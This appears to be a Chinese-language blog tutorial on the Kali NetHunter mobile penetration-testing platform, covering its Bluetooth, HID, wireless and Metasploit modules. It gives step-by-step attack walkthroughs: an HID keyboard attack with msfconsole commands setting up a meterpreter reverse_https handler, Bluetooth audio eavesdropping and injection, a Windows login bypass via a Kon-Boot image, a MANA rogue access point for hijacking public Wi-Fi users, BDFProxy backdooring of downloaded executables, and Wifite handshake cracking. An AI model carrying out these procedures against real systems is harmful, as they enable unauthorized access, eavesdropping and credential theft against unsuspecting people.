• Type-C?OTG：目前支持Type-C接口的設(shè)備（比如小米Mix系列等）
• Lightning?OTG：蘋果手機(jī)專用OTG

應(yīng)用場(chǎng)景

• 數(shù)據(jù)傳輸

  

• 系統(tǒng)重做（刷機(jī)）。當(dāng)手機(jī)或其他設(shè)備宕機(jī)后，可以使用OTG線將裝有系統(tǒng)刷機(jī)包的U盤連接后加電重啟后通過(guò)加載刷機(jī)包進(jìn)行刷機(jī)。
• 外接設(shè)備。比較常見(jiàn)的支持USB的設(shè)備均可通過(guò)OTG方式進(jìn)行連接，常見(jiàn)的比如鍵盤、手機(jī)、游戲操作手柄等等。
• 臨時(shí)反向充電。當(dāng)外出在外，有些小設(shè)備（手環(huán)、智能手表、MP3等）沒(méi)有電時(shí)，可以通過(guò)使用支持反向充電的專用OTG線連接手機(jī)進(jìn)行充電。

主菜單

如果你尚未通過(guò) OTG 連接您的藍(lán)牙適配器，然后按刷新圖標(biāo)將它們放在微調(diào)菜單中。 啟用 dbus、藍(lán)牙服務(wù)，并使用交換機(jī)啟動(dòng)適配器 （hci0）。如果選擇第二個(gè)適配器 （hci1），請(qǐng)?jiān)俅吸c(diǎn)擊刷新，然后使用接口開(kāi)關(guān)調(diào)出該適配器。在微調(diào)器中選擇掃描所需的接口。如果 10 秒不理想，請(qǐng)輸入您的掃描時(shí)間。您已準(zhǔn)備好掃描，請(qǐng)按“掃描設(shè)備”。如果找到任何，請(qǐng)點(diǎn)擊它，以便將其選中以供以后使用。

工具

輸入接口名稱（如果使用多個(gè)適配器）。你可以通過(guò)點(diǎn)擊 "USE SELECTED TARGET" 來(lái)粘貼選定的目標(biāo)地址。

L2ping

非常適合使目標(biāo)的藍(lán)牙堆棧崩潰，因此連接的設(shè)備可能會(huì)斷開(kāi)連接，可用于發(fā)現(xiàn)或攻擊。修改大小，或根據(jù)需要計(jì)數(shù)。Flood ping 還增加了斷開(kāi)配對(duì)設(shè)備的可能性。反向 ping 發(fā)送回顯響應(yīng)而不是回顯請(qǐng)求。

Redfang

用于查找未處于配對(duì)模式的設(shè)備。輸入目標(biāo)范圍，并根據(jù)需要修改日志文件路徑。點(diǎn)擊“HUNT FOR DEVICES”開(kāi)始。

Blueranger

查看目標(biāo)有多近。點(diǎn)擊“CHECK PROXIMITY”開(kāi)始。

SDPtool

查看目標(biāo)并找到開(kāi)放的服務(wù)。免提服務(wù)是我們脆弱的音頻服務(wù)。點(diǎn)擊“發(fā)現(xiàn)服務(wù)”開(kāi)始。

Spoof (惡搞、欺騙)

輸入接口名稱（如果使用多個(gè)適配器）。您可以通過(guò)點(diǎn)擊“使用所選目標(biāo)”來(lái)粘貼所選目標(biāo)的地址、名稱和類別，否則輸入所需的修改。點(diǎn)擊“應(yīng)用”進(jìn)行設(shè)置。也可以通過(guò)點(diǎn)擊“檢查”進(jìn)行驗(yàn)證。

Carwhisperer

輸入接口名稱（如果使用多個(gè)適配器）。您可以通過(guò)點(diǎn)擊“使用選定的目標(biāo)”來(lái)粘貼選定的目標(biāo)地址。如果目標(biāo)的免提服務(wù)位于不同的頻道上，請(qǐng)修改頻道。選擇模式：

• Listen：將開(kāi)始錄制來(lái)自目標(biāo)麥克風(fēng)的音頻。如果需要，請(qǐng)修改記錄文件名。
• Inject：將選定的音頻注入目標(biāo)，因此它將在其揚(yáng)聲器上播放。輸入或選擇要注入的音頻文件的路徑。點(diǎn)擊“LAUNCH”在終端中啟動(dòng)腳本。您可以使用 CTRL+C 在終端中殺死，也可以在應(yīng)用程序中點(diǎn)擊“殺死”。如果收聽(tīng)正在運(yùn)行，播放按鈕將開(kāi)始在揚(yáng)聲器上實(shí)時(shí)流式傳輸，否則它將播放最后的錄音。請(qǐng)注意，停止按鈕將停止播放，不支持暫停。

Bad Bluetooth

Server

輸入您想要的鍵盤藍(lán)牙接口、地址和名稱以用于 BadBT 服務(wù)器。確保您的接口已啟動(dòng)并運(yùn)行，包括 dbus 和藍(lán)牙服務(wù)。點(diǎn)擊“啟動(dòng)服務(wù)器”，它將在終端窗口中運(yùn)行，準(zhǔn)備接受來(lái)自目標(biāo)客戶端的傳入連接。某些目標(biāo)可能需要在終端中輸入“是”才能進(jìn)行配對(duì)過(guò)程。

Client

連接目標(biāo)后，返回NetHunter應(yīng)用程序，是時(shí)候發(fā)送一些字符串了，或者您可以使用交互模式（需要將物理鍵盤連接到手機(jī)）。對(duì)于發(fā)送字符串模式，您可以設(shè)置基本前綴，例如 Android Home、Browser、Windows CMD 等。請(qǐng)注意，這些模式是實(shí)驗(yàn)性的，可能會(huì)實(shí)現(xiàn) HID Ducky 格式。準(zhǔn)備就緒后，點(diǎn)擊“發(fā)送”。

NetHunter Chroot Manager

NetHunter chroot 管理器可以下載和安裝 Kali Linux chroot、備份和恢復(fù) chroot，以及刪除現(xiàn)有的 chroot。此外，還可以根據(jù)需要安裝各種 Kali Linux 元包。

通常 "kali-nethunter" 元包包含運(yùn)行 NetHunter 所需的一切，在磁盤空間不足時(shí)，可以僅在真正需要時(shí)添加額外的元包。如果磁盤空間充足，可以全部安裝。

什么是元包？元包英文 Metapackages，kali 為了方便管理將所有軟件按用途進(jìn)行了分類

kali-tools-802-11
kali-tools-bluetooth
kali-tools-crypto-stego
kali-tools-database
kali-tools-exploitation
kali-tools-forensics
kali-tools-fuzzing
kali-tools-gpu
kali-tools-hardware
kali-tools-headless
kali-tools-information-gathering
kali-tools-passwords
kali-tools-post-exploitation
kali-tools-reporting
kali-tools-reverse-engineering
kali-tools-rfid
kali-tools-sdr
kali-tools-sniffing-spoofing
kali-tools-social-engineering
kali-tools-top10
kali-tools-voip
kali-tools-vulnerability
kali-tools-web
kali-tools-windows-resources
kali-tools-wireless

安裝命令比如 sudo apt install?kali-tools-hardware 就安裝了硬件黑客類的所有軟件

也大致進(jìn)行了分類：

kali-linux-arm
kali-linux-core
kali-linux-default
kali-linux-everything
kali-linux-large
kali-linux-nethunter

默認(rèn)kali安裝的是 kali-linux-core、kali-linux-default 兩個(gè)包，并沒(méi)有裝全部，要裝全部?sudo apt install?kali-linux-everything。kali-linux-everything 包含有 kali-linux-large。

NetHunter Components(組件、組成)

• 自定義 Android Kernel：自定義內(nèi)核為每個(gè)設(shè)備提供了現(xiàn)有內(nèi)核所不具備的獨(dú)特功能。所有 NetHunter 內(nèi)核都提供 HID（鍵盤到計(jì)算機(jī)支持）、OTG 無(wú)線支持和 CDROM 仿真支持。此外，大多數(shù)內(nèi)核還支持外部 SDR/藍(lán)牙和“Y 型電纜充電”，這允許您在使用外部設(shè)備時(shí)為設(shè)備充電。如果您是高級(jí) Android 用戶，那么您將受益于每個(gè)內(nèi)核中帶有 KEXEC 補(bǔ)丁的 Multirom 支持。最后，內(nèi)核提供了額外的補(bǔ)丁/修復(fù)程序，以消除添加外部無(wú)線設(shè)備可能導(dǎo)致的問(wèn)題。
• Kali Linux chroot：Kali Linux chroot 是 NetHunter 的核心，專門修改了配置文件以與 Android 生態(tài)系統(tǒng)很好地配合。您將獲得兩個(gè) chroot 選項(xiàng)來(lái)下載或安裝：minimal 或 full。最小的 chroot 大小略高于 100mb，是一個(gè)準(zhǔn)系統(tǒng)的基本 Kali 操作系統(tǒng)，沒(méi)有安裝任何內(nèi)容，非常適合開(kāi)發(fā)人員或任何希望自定義安裝的人。完整的 chroot 是大多數(shù)用戶想要下載的，大約有 600mb。完整的 chroot 具有與 Android 應(yīng)用程序集成所需的一切。
• NetHunter Android 應(yīng)用程序：NetHunter 應(yīng)用程序提供了一個(gè)簡(jiǎn)單的界面來(lái)管理 Kali Linux chroot，是一個(gè)簡(jiǎn)單但功能強(qiáng)大的 GUI。Android 應(yīng)用程序包含首次運(yùn)行時(shí)復(fù)制到 SD 卡的所有配置文件。它還充當(dāng)啟動(dòng)服務(wù)，并將在設(shè)備啟動(dòng)時(shí)運(yùn)行您選擇的服務(wù)。此外，Android 應(yīng)用程序允許您更輕松地與一些預(yù)選應(yīng)用程序進(jìn)行交互，例如：MANA、MPC、VNC、DuckHunter、HID 攻擊等等。最新版本甚至包括一個(gè)自定義命令構(gòu)建器，讓您可以輕松地將您喜歡的自定義命令添加/刪除到 NetHunter。

NetHunter 自定義命令

NetHunter Android 應(yīng)用程序的一個(gè)很酷的功能是能夠添加您自己的自定義命令和功能。例如，如果您進(jìn)行大量 Wi-Fi 工作，則為 Wifite 添加一個(gè)自定義按鈕是有意義的，該按鈕將啟動(dòng)相應(yīng)的腳本?；蛘撸绻枰焖倏寺?mifare 卡，您可以制作一個(gè)按鈕來(lái)執(zhí)行具有所需參數(shù)的 mfoc 命令。此選項(xiàng)卡附帶了一些預(yù)配置的自定義命令作為示例。

NetHunter DuckHunter 攻擊

DuckHunter HID 選項(xiàng)允許您快速輕松地將?USB Rubber Ducky?腳本轉(zhuǎn)換為 NetHunter HID 攻擊格式。您可以從“示例預(yù)設(shè)”菜單中選擇一個(gè)選項(xiàng)，也可以從?Duck Toolkit?站點(diǎn)上的更多預(yù)配置腳本中進(jìn)行選擇。

Exploit (漏洞)?數(shù)據(jù)庫(kù)

Exploit?Database?SearchSploit：漏洞數(shù)據(jù)庫(kù)中搜索漏洞。通過(guò) SearchSploit?窗口，你可以根據(jù)所選條件輕松地在?The Exploit Database?存檔中搜索條目。一旦找到了一個(gè)感興趣的漏洞，你可以選擇在線查看它，甚至在本地編輯它，根據(jù)你的特定目標(biāo)進(jìn)行定制。

HID 鍵盤攻擊

NetHunter HID KeyBoard Attack?將您的設(shè)備及其 OTG USB 電纜變成預(yù)編程鍵盤，能夠鍵入任何給定的命令。以前，只有“Teensy”類型的設(shè)備才能做到這一點(diǎn)......但現(xiàn)在不再是了！這種攻擊通常效果很好。但是，如果它變得無(wú)響應(yīng)，只需從菜單中選擇重置 USB 即可刷新 USB 堆棧。

示例：在過(guò)去,USB自啟往往依賴插入的USB設(shè)備中的autorun.inf實(shí)現(xiàn).時(shí)下這招往往不靈,而新興的USB HID Attack則成為新的安全威脅.USB HID可通過(guò)模擬鍵盤或鼠標(biāo)操作,實(shí)時(shí)執(zhí)行目標(biāo)代碼,在此以PowerSploit結(jié)合MSF為例：首先運(yùn)行提供payload的webserver，在 Kali Service Control中開(kāi)啟Apache 服務(wù)器

轉(zhuǎn)到 HID 攻擊配置頁(yè)面，選擇 PowerSploit

IP和端口填寫MSF監(jiān)聽(tīng)的IP端口，Payload?這里選擇 windows/meterpreter/reverse_https，URL 為提供 Apache 服務(wù)的IP，這里即本機(jī)：192.168.1.151 。配置好后UPDATE配置文件,接下來(lái)需配置MSF監(jiān)聽(tīng)反彈shell

[email protected]:~# msfconsole -q
msf > use exploit/multi/handler
msf exploit(handler) >

payload 同 HID 配置頁(yè)面中的 payload

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https

IP 和 端口 同樣設(shè)置

msf exploit(handler) > msf exploit(handler) > set LHOST 192.168.0.17
LHOST => 192.168.0.17
msf exploit(handler) > set LPORT 4444
LPORT => 443
msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...

至此配置 OK

開(kāi)始監(jiān)聽(tīng)

此時(shí)將設(shè)備連接至PC機(jī)，等待設(shè)備被識(shí)別后，執(zhí)行 Execute，攻擊開(kāi)始。POWERSHELL 命令執(zhí)行后，就可在 msf 中看到反彈的 shell 了。

如連上PC后沒(méi)有反應(yīng)，可按 Reset USB鍵更新。當(dāng)然，HID KeyBoard Attack 也提供了 Windows CMD攻擊模塊，即連入計(jì)算機(jī)后自動(dòng)打開(kāi)CMD并執(zhí)行指定命令(默認(rèn)為添加新管理員用戶，可自由定制)。

NetHunter 主屏幕

NetHunter 主屏幕提供了一個(gè)公共位置，可以查看有關(guān)設(shè)備的一些有用的常用信息，包括外部和內(nèi)部 IP 地址，以及 HID 接口的可用性。

NetHunter Kali 服務(wù)

Kali 服務(wù)窗格允許您啟動(dòng)和停止各種 chroot 服務(wù)，例如 SSH、Apache、OpenVPN 等。要啟動(dòng)或停止任何可用的網(wǎng)絡(luò)服務(wù)，只需點(diǎn)擊可用選項(xiàng)中的相應(yīng)按鈕即可。如果需要，此窗格還允許您在啟動(dòng)時(shí)啟用這些服務(wù)。請(qǐng)注意，這些服務(wù)對(duì)應(yīng)于 chroot 的 Kali Linux 服務(wù)，而不是原生 Android 服務(wù)。警告：在啟用對(duì)設(shè)備的遠(yuǎn)程訪問(wèn)之前，請(qǐng)確保您已更改任何默認(rèn)密碼，因?yàn)?Kali 帶有默認(rèn)的“toor”密碼。

NetHunter KeX 管理器

Being mobile doesn’t mean putting up with tiny! (手機(jī)端并不意味著功能微小)。通過(guò) HDMI 或屏幕投射連接顯示器，可以獲得桌面版本 Kali?一樣的體驗(yàn)。

手機(jī)端 連接 nethunter：

1、選擇菜單 "Kex Manager"， 點(diǎn)擊 "SETUP LOCAL SERVER"?設(shè)置VNC密碼；

2、取消勾選 "Localhost Only"

3、選擇用戶（可選），默認(rèn) kali

4、點(diǎn)擊 "START SERVER"

5、點(diǎn)擊 OPEN KEX CLIENT，打開(kāi) NetHunter KeX，輸入用戶名 kali 前面設(shè)置的密碼即可

PC端?連接 nethunter：

需要下載支持 VNC 的軟件，這里使用?MobaXterm，打開(kāi) MobaXterm，選擇 VNC，輸入地址：手機(jī)IP:端口? 進(jìn)行連接。然后輸入密碼就進(jìn)去了！

vnc setting localhost:1 port 5901（注意：這里可能每個(gè)人的不一樣，在終端中設(shè)置vnc密碼的時(shí)候，平常后會(huì)出現(xiàn)個(gè)數(shù)字，大概像 1,2,3,4 這樣的 ），類似的，port 就應(yīng)為 5901,5902,5903。
輸入設(shè)置的6位 vnc 密碼。點(diǎn)擊 connect 就可以出現(xiàn)圖形化界面。

啟動(dòng) KeX 管理器

單擊 菜單項(xiàng)，然后選擇“KeX 管理器”以打開(kāi) KeX 菜單。在這里可以啟動(dòng)和停止服務(wù)，打開(kāi)KeX客戶端并配置高級(jí)設(shè)置?？梢酝ㄟ^(guò)執(zhí)行以下步驟來(lái)啟動(dòng) KeX：

• 首次使用前設(shè)置 KeX 密碼
• 啟動(dòng) KeX 服務(wù)器
• 打開(kāi) KeX 客戶端
• 輸入 KeX 密碼（該密碼安全地存儲(chǔ)在連接配置文件中）
• 在 KeX 客戶端點(diǎn)擊“連接”，連接 KeX 服務(wù)器
• 連接HDMI顯示器和藍(lán)牙鍵盤和鼠標(biāo)（可選，設(shè)備可用作觸摸板）

打開(kāi)“高級(jí)設(shè)置”并設(shè)置自定義分辨率以適合連接的顯示器

設(shè)置 KeX。在首次啟動(dòng) KeX 服務(wù)器之前，單擊“SETUP LOCAL SERVER”并配置會(huì)話密碼和只讀密碼。

啟動(dòng) KeX。要啟動(dòng) KeX，請(qǐng)單擊“啟動(dòng)服務(wù)器”。要停止 KeX，請(qǐng)單擊“停止服務(wù)器”。若要顯示服務(wù)器是否正在運(yùn)行，請(qǐng)單擊“刷新”按鈕。

啟動(dòng) KeX 客戶端。要啟動(dòng) KeX 客戶端，請(qǐng)單擊“打開(kāi) KEX 客戶端”

首次連接前，請(qǐng)?jiān)诿艽a字段中輸入密碼（設(shè)置服務(wù)器時(shí)配置的密碼）

點(diǎn)擊?connect?即可

使用 KeX 控件。觸摸屏幕會(huì)顯示屏幕顯示 2 秒鐘，這允許您打開(kāi)屏幕鍵盤或上下文菜單來(lái)配置或斷開(kāi) KeX 會(huì)話。你可以隨時(shí)斷開(kāi)并重新連接到您的會(huì)話。

高級(jí) KeX 設(shè)置。打開(kāi)“高級(jí)設(shè)置”菜單以調(diào)整顯示分辨率設(shè)置。

NetHunter?更改?MAC

MAC Changer?窗口允許你更改 NetHunter 設(shè)備網(wǎng)絡(luò)接口的 MAC 地址。您可以選擇將 MAC 地址設(shè)置為隨機(jī)值，也可以使用標(biāo)準(zhǔn)的 6 對(duì)表示法（如 00：11：22：AA：BB：CC）手動(dòng)輸入。

MITM?框架

MITM?(Man In The Middle)?由 @byt3bl33d3r 編寫，提供了方便的一站式服務(wù)，滿足你所有的 MitM 和網(wǎng)絡(luò)攻擊需求。它包括鍵盤記錄、cookie 捕獲、ARP 中毒、注射、欺騙等等。

NetHunter MANA 邪惡接入點(diǎn)

The MANA Toolkit?是?SensePost?的邪惡接入點(diǎn)實(shí)現(xiàn)，可執(zhí)行流氓 Wi-Fi AP 和 MitM 攻擊。MitM 日志被寫入 Kali chroot 中的 /var/lib/mana-toolkit/。

默認(rèn)的 MANA 配置應(yīng)按原樣工作，但是，您可以調(diào)整任何可用設(shè)置以匹配您的目標(biāo)環(huán)境，例如 ssid、通道號(hào)等。將所有內(nèi)容配置到您滿意的程度后，點(diǎn)擊“更新”按鈕以保存配置。

Metasploit Payload?生成

MSFvenom Payload Creator (MFSPC)?由 g0tmi1k 編寫，用于消除使用 Metasploit msfvenom 實(shí)用程序生成有效負(fù)載的痛苦。只需選擇您的有效負(fù)載，設(shè)置其選項(xiàng)，然后生成您的有效負(fù)載。

Nmap?掃描

通過(guò) Nmap 掃描窗口，你可以輕松訪問(wèn)功能強(qiáng)大的 Nmap 掃描最常用的選項(xiàng)，讓您輕松對(duì)目標(biāo)或網(wǎng)絡(luò)進(jìn)行深入掃描，而無(wú)需使用屏幕鍵盤在命令行上鍵入長(zhǎng)字符串。

Social Engineer Toolkit

NetHunter 社會(huì)工程師工具包。Social Engineer Toolkit 網(wǎng)絡(luò)釣魚(yú)電子郵件模板創(chuàng)建器使您可以自定義 3 個(gè)網(wǎng)絡(luò)釣魚(yú)電子郵件模板。插入您自己的鏈接、縮略圖、名稱和主題。這些模板保存到 SET 的 templates 目錄中，因此可以在使用群發(fā)郵件攻擊時(shí)選擇它。

無(wú)線網(wǎng)卡和 NetHunter

Wireless Cards and NetHunter。外部無(wú)線網(wǎng)卡是必要的，因?yàn)槌爽F(xiàn)代驍龍 SOC 中使用的一些高通芯片外，Android 設(shè)備在大多數(shù)設(shè)備上不支持監(jiān)控模式。有些設(shè)備可以通過(guò)修改后的固件和內(nèi)核支持監(jiān)控模式，例如Nexus 5,7（2012）和Nexus 6P。目前，只有經(jīng)過(guò)特殊修改的Nexus 5版本支持Nethunter的監(jiān)視模式。

有幾個(gè)限制是 Android 設(shè)備需要 USB-OTG 電纜并且功率輸出有限。由于這些限制，并非所有無(wú)線網(wǎng)卡都能接收必要的電源輸出，并且可能不支持外部電源（Y 型電纜）。

當(dāng)問(wèn)“NetHunter 的最佳卡是什么？”時(shí)，您需要問(wèn)問(wèn)自己您的用例是什么。雖然所有的卡在近距離上都可能表現(xiàn)相似，但其中一些卡具有更高的發(fā)射功率和天線附件，這使得它們能夠在比小型卡更遠(yuǎn)的距離上工作。還有一種可能性是，您的設(shè)備可能只能通過(guò) OTG 提供 450 mA 或更低的功率，而不是完整的 USB 500 mA 規(guī)格。如果是這種情況，您可能需要考慮傳輸功率較低的設(shè)備。

默認(rèn)情況下，大多數(shù)（如果不是全部）NetHunter 內(nèi)核都支持以下芯片組：

Atheros

• ATH9K_HTC (AR9271, AR7010)
• ATH10K

Ralink

• RT73
• RT2800USB
• RT3070

Realtek?瑞昱

• RTL8188EUS
• RTL8188CU
• RTL8188RU
• RTL8192CU
• RTL8192EU
• RTL8723AU
• RTL8811AU
• RTL8812AU
• RTL8814AU
• RTL8821AU
• RTW88-USB

MediaTek。MediaTek?聯(lián)發(fā)科

• MT7610U
• MT7612U

Qualcomm internal wifi chipsets (wlan0)。高通內(nèi)置 wifi 芯片組 （wlan0）

• QCACLD-2.0
• QCACLD-3.0

以下設(shè)備已確認(rèn)與 NetHunter?可以一起使用：

• TP-Link TL-WN722N v1 (Please note that v2 & v3 have unsupported chipsets) but v2 and v3 may be supported using RTL8812AU drivers.)

• TP-Link TL-WN822N v1 - v4

• Alfa Networks AWUS036ACH

• Alfa Networks AWUS036NEH (recommended by @jcadduono)

• Alfa Networks AWUS036NHA

• Alfa Networks AWUSO36NH

• Panda PAU05 Nano

以下設(shè)備已確認(rèn)部分適用于 NetHunter 版本：

• Alfa Networks AWUS051NH (dual band 5 GHz support may be unreliable)

以下設(shè)備已確認(rèn)不能與 NetHunter 版本一起使用：

繞過(guò) Windows 登錄認(rèn)證

NetHunter 其實(shí)有許多隱藏玩法，比如借助 DriveDroid 實(shí)現(xiàn) Windows 登陸繞過(guò)密碼。DriveDroid本是個(gè)允許通過(guò)安卓手機(jī)中的 ISO/IMG 鏡像文件引導(dǎo)啟動(dòng) PC機(jī)的一個(gè)App，但結(jié)合了特定的鏡像，實(shí)現(xiàn)繞過(guò) Windows 登陸認(rèn)證就變得可行。

以Win7為例，首先為默認(rèn)賬戶創(chuàng)建密碼 hello ，DriveDroid 默認(rèn)引導(dǎo)鏡像存放目錄位于SDCard/Download/images，只需將欲引導(dǎo)的鏡像存放于此目錄即可。

這里繞過(guò)Windows或OSX登陸認(rèn)證的鏡像為 Kon-Boot?？梢缘焦倬W(wǎng)了解，其原理在于處理BIOS修改系統(tǒng)內(nèi)核的引導(dǎo)處理，跳過(guò)SAM檢查，直接登陸系統(tǒng)。因?yàn)槭歉顿M(fèi)軟件，以下以自行尋覓的鏡像為例演示。關(guān)閉 MTP文件傳輸，打開(kāi) DriveDroid，自動(dòng)列出 images 目錄下得鏡像文件。

選擇 Kon-Boot.img 鏡像掛載，模式這里選擇為 Read-Only USB

加載成功后相應(yīng)鏡像有所標(biāo)志

而在連入的PC機(jī)中也會(huì)顯示加載有新的可移動(dòng)磁盤(或軟驅(qū)盤)，如未能顯示，可在配置頁(yè)面進(jìn)行相應(yīng)調(diào)整(可通過(guò)USB Setup Wizard向?qū)е敢?

此時(shí)在設(shè)有密碼的PC機(jī)重啟，進(jìn)入BIOS設(shè)置啟動(dòng)項(xiàng)

如果鏡像加載成功，可以看到飛奔的圖案如下:

之后登陸用戶密碼處回車即可繞過(guò)密碼認(rèn)證登陸系統(tǒng)

需要說(shuō)明的是，通過(guò)此方式登陸系統(tǒng)無(wú)法直接修改或刪除系統(tǒng)密碼。

WarDriving

字面意思是 "戰(zhàn)爭(zhēng)駕駛、駕駛攻擊"。"駕駛"?是相當(dāng)字面的。黑客駕駛汽車（或有時(shí)是其他車輛，如自行車）四處走動(dòng)，配備特殊設(shè)備，可繪制出不安全的 Wi-Fi 網(wǎng)絡(luò)。其實(shí)就是不斷的改變位置信息進(jìn)行攻擊。在 NetHunter 的 Wireless 模塊中 Kismet 作為 WarDriving 的默認(rèn)工具，不過(guò)操作起來(lái)畫面太美不敢看。在啟動(dòng) kismet 之前，請(qǐng)確保您的無(wú)線接口處于監(jiān)視器模式。由于監(jiān)視器模式 QCACLD-3.0 驅(qū)動(dòng)程序，也可以使用內(nèi)部無(wú)線接口。

退而求其次，推薦使用 App WigleWifi。不過(guò)注意不要不小心上傳數(shù)據(jù)。使用easy，界面很難看。

好在數(shù)據(jù)可以以 Sqlite 數(shù)據(jù)庫(kù)格式存儲(chǔ)在本地。

Mana EvilAP蜜罐

想建個(gè) CMCC 無(wú)線網(wǎng)絡(luò)釣魚(yú)劫持流量? PineApple 沒(méi)有帶在身邊，不妨拿出手機(jī)，開(kāi)個(gè)蜜罐。Mana蜜罐采用與 PineApple 相同的:Hostapd的Karma補(bǔ)丁，可用來(lái)欺騙接入無(wú)線網(wǎng)絡(luò)用戶，使其可很平滑連接到虛假AP中，進(jìn)行后續(xù)攻擊。

需要說(shuō)明的是：NetHunter無(wú)線攻擊模塊，大都需要使用 OTG 外接USB無(wú)線網(wǎng)卡，主流芯片(可以試試 Kali 是否可直接識(shí)別)網(wǎng)卡均可。WN722N 較為推薦，迷你的EDUP網(wǎng)卡通用性則較強(qiáng)(Raspberry Pi也可直接識(shí)別)，只是信號(hào)強(qiáng)度..自然可想而知。

Mana蜜罐有多種Hacking模式，均為sh腳本，可自由定制。

Mana工具安裝目錄為：/usr/share/mana-toolkit
啟動(dòng)腳本則在此處存放：/usr/share/mana-toolkit/run-mana
截獲流量文件存放于：/var/lib/mana-toolkit

通過(guò) NetHunter Home 的Mana蜜罐頁(yè)面可方便的對(duì)配置文件進(jìn)行修改：

Hostapd 配置文件

DHCP服務(wù)配置文件

DNS 欺騙配置文件

服務(wù)啟動(dòng)腳本有多個(gè)，均可自由編輯修改:

上圖對(duì)應(yīng)腳本 start-nat-full.sh，腳本需要USB無(wú)線網(wǎng)卡(存在上行流量)啟動(dòng)，無(wú)線連入為NAT模式，并啟動(dòng)所有腳本包括：firelamb、sslstrip、sslsplit 等，截獲流量并保存。

start-nat-simple.sh 同樣有上行流量，但并不啟動(dòng) firelamb、sslstrip、sslsplit 等腳本。

start-nat-simple-bdf.sh，加入了BDF惡意代碼Inject工具，后面章節(jié)將對(duì)其攻擊思路進(jìn)行介紹。此外，還有?

start-noupstream.sh ：Mana作為無(wú)法上網(wǎng)的虛假AP啟動(dòng)，但可吸引WIFI默認(rèn)開(kāi)啟的終端自動(dòng)連接并抓取信息。
start-noupstream-eap.sh：Mana同樣無(wú)法上網(wǎng)，但會(huì)進(jìn)行EAP攻擊

編輯好啟動(dòng)文件后，Start Attack，會(huì)彈窗勾選啟動(dòng)腳本：

即可啟動(dòng)服務(wù)。

Backdooring Executable Over HTTP

對(duì)使用HTTP協(xié)議傳送的二進(jìn)制文件注入shellcode。

首先建立一個(gè)Mana蜜罐，SSID 這里使用默認(rèn)名稱 internet，啟動(dòng)服務(wù)

cd /usr/share/mana-toolkit/run-mana
./start-nat-simple-bdf.sh

再開(kāi)一個(gè)Shell，編輯 bdfproxy.cfg，此配置文件包含了針對(duì)不同平臺(tái)默認(rèn)設(shè)置的 payload，可自行更換。不過(guò)由于顯示問(wèn)題，用 nano 編輯文本會(huì)一行行刷新，還是換個(gè)方式編輯比較好。這里只把IP 修改192.168.1.151，也可在 Nethunter 的主面板下的 MANA Evil Access Point 中進(jìn)行配置。

nano /etc/bdfproxy/bdfproxy.cfg??配置好IP之后，在Shell中直接輸入bdfproxy運(yùn)行之。再新開(kāi)一個(gè)Shell 啟動(dòng) Metasploit

一切準(zhǔn)備就緒，等待連入蜜罐AP的PC機(jī)上網(wǎng)下載二進(jìn)制文件，在此通過(guò)百度下載 everything (神器啊)演示：

運(yùn)行everthing，因?yàn)樽⑷肓?payload，會(huì)出現(xiàn)自校驗(yàn)失敗的提示

查看MSF，已成功反彈回Shell，而上面自校驗(yàn)失敗的提示就是MeterPreter 的screenshot?截圖

不得不說(shuō)，這個(gè)新特性真的很Cool。

Wifite 破解

如果沒(méi)有無(wú)線破解是不科學(xué)的，NetHunter推薦的 Wifite 破解工具是其最早集成的功能之一。移動(dòng)設(shè)備的便攜性更有利于隨時(shí)隨地進(jìn)行Wifi安全測(cè)試，只需掛載上外置無(wú)線網(wǎng)卡便可輕松抓包破解，不過(guò)并不建議直接在移動(dòng)設(shè)備上破解抓到的包，如跑幾分鐘沒(méi)結(jié)果，就拿高性能設(shè)備破解吧，否則易導(dǎo)致設(shè)備死機(jī)。連接好外置無(wú)線網(wǎng)卡后，在 Nethunter 主菜單選擇 Launch Wifite 即可進(jìn)入

選擇開(kāi)啟混雜監(jiān)聽(tīng)模式的網(wǎng)卡，選擇Wlan1

掃描開(kāi)始，每5秒更新一次，當(dāng)確認(rèn)攻擊目標(biāo)后 CTRL+C 停止掃描

輸入攻擊目標(biāo)序號(hào)，這里就選 XDSEC-WIFI，輸入2

抓包成功后自動(dòng)調(diào)用字典破解，這里機(jī)智的把字典刪掉，其自動(dòng)退出

抓到的握手包存放在 /data/local/kali-armhf/HS目錄下，命名規(guī)則是 SSID+MAC

如果目標(biāo)開(kāi)啟 WPS，則自動(dòng)進(jìn)行PIN碼破解。Wifite 相對(duì)傻瓜化，易操作，適合移動(dòng)終端。連入無(wú)線后結(jié)合 zANTI 等工具調(diào)戲即可。

3、安裝?精簡(jiǎn)版(NetHunter Lite)

有 root?就安裝完整版，沒(méi) root?就安裝?Rootless 版本。

4、安裝?非root版 (Rootless)

官網(wǎng) NetHunter Rootless?安裝步驟：https://www.kali.org/docs/nethunter/nethunter-rootless/

1. NetHunter Store App?下載地址?https://store.nethunter.com/NetHunterStore.apk
2. NetHunter Web Store?訪問(wèn)地址?https://store.nethunter.com/
3. NetHunter Apps?源碼在 GitLab?https://gitlab.com/kalilinux/nethunter/apps/

所有應(yīng)用程序都可以通過(guò) NetHunter Store 客戶端安裝。

從 store.nethunter.com (?https://store.nethunter.com/ ) 安裝 NetHunter-Store 應(yīng)用程序

安裝 F-Droid 開(kāi)源軟件商店：https://f-droid.org/zh_Hans/
使用 F-Droid 商店安裝 Termux：https://f-droid.org/packages/com.termux/

從 NetHunter-Store 安裝 Termux、NetHunter-KeX客戶端 和 Hacker’s keyboard

打開(kāi) Termux?執(zhí)行下面命令，如果卡在 installing 就開(kāi)個(gè)代理

$ termux-setup-storage? ? ? 添加訪問(wèn)存儲(chǔ)權(quán)限，點(diǎn)擊允許
$ pkg install wget
$ wget -O install-nethunter-termux https://offs.ec/2MceZWr
$ chmod +x install-nethunter-termux
$ ./install-nethunter-termux

執(zhí)行 "./install-nethunter-termux" 命令會(huì)從 nethunter 下包，如下：

一般情況下都會(huì)丟包導(dǎo)致SSL error:(null)最終！導(dǎo)致校驗(yàn)失敗無(wú)法安裝。這時(shí)候使用迅雷或者其他的下載軟件下載對(duì)應(yīng)的壓縮包。https://images.kali.org/nethunter/kalifs-arm64-full.tar.xz? 然后把下載好的壓縮包復(fù)制到手機(jī)下的download目錄下，在終端里執(zhí)行如下命令。
cd storage
cd downloads
mv kalifs-arm64-full.tar.xz /data/data/com.termux/files/home
cd /data/data/com.termux/files/home
./install-nethunter-termux
第一個(gè)藍(lán)色句子意思大概是發(fā)下同名文件，是否要?jiǎng)h除下載下一個(gè)？N、
